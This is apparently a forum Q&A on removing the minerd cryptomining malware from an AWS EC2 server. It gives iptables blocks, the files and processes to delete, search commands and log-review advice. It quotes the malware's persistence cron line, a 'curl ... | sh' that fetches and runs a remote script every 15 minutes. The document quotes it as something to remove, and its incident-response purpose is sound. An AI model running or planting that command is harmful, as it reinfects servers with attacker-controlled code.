How can I kill minerd malware on an AWS EC2 instance?
I found the solution to removing minerd
. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script -
- On monkeyoto's suggestion, I blocked all communication with the mining pool server -
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
andiptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
. - Removed the cron
*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh
from/var/spool/cron/root
and/var/spool/cron/crontabs/root
. - Removed the directory
/opt/yam
. - Removed
/root/.ssh/KHK75NEOiq
. - Deleted the files
/opt/minerd
and/opt/KHK75NEOiq33
. - Stopped the minerd process -
pkill minerd
. - Stopped
lady
-service lady stop
.
I ran ps -eo pcpu,args --sort=-%cpu | head
, top -bn2 |sed -n '7,25'p
and ps aux | grep minerd
after that and the malware was nowhere to be seen.
I still need to figure out how it gained access into the system but I was able to disable it this way.
Your first goal is (if you don't want to reinstall) is to determine how it managed to get there in the first place. If the attacker was crafty, they'd of run "timestomp" to modify the dates of binaries. You minimizing SSH does little if you're running a vulnerable version of Wordpress, or Joomla, or something different. For example, there was a Nagios exploit that was used by someone to run minerd. So the goal... "Determine what is running, why is it running, and is it vulnerable?"
Second, you want to block all communications to and from the mining-pool server:
iptables -A INPUT -S xmr.crypto-pool.fr -j DROP
So how do you determine what was modified/changed/vulnerable? You need to understand your system. What does it do, why does it do it, and who needs access to it. I would search my crontabs to see what, if anything is starting. You could run: service --status-all
to see what services are running/starting up, and investigate those. /opt/minerd seems to be a file, checksum that file and you could create a script to search for anything calling that file, or any files that match, e.g.: find / | xargs grep -i minerd
or find / | xargs grep -i CHECKSUM_of_MINERD
(Keep in mind this is a brutal way of searching within files).
Third, check your logs. If you are running a webserver, I'd begin with error logs (error_logs) and look for multiple 403 and 404s from an address followed by a successful connection in access_log. Check the path that was accepted (e.g. 200: /var/www/nagios_or_something_vulnerable/config.php) and look inside the directory. There are many approaches to finding this information, but no ONE here can give you a complete answer as we can only infer information based on the limited amount of information you post.
"I have a file named minerd starting!" Dig for that file. (find /|xargs grep -i minerd
). "It uses this weird string!" (find / |xargs grep -i 47TS1NQvebb3Feq
). "It makes a connection to port 8080!" (lsof -i | awk '/8080|http-alt/{print $1"\t"$2"\t"$8"\t"$9}'
). "It's connecting to this address!" (lsof -i | grep xmr.crypto
... There you now have a baseline of things you can do.
The problem is that the minerd is probably the payload of some (other) malware, so you can't really tell what else has been compromised on the system. Possibly there isn't anything else resident on the system, and you are just getting re-infected each time you kill the miner.
Alternatively there is some management/dropper process which has opened a back-door onto your server.
The safest bet is to recreate the server. But if you want to scan it you can get Sophos Anti-Virus for free from https://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-linux.aspx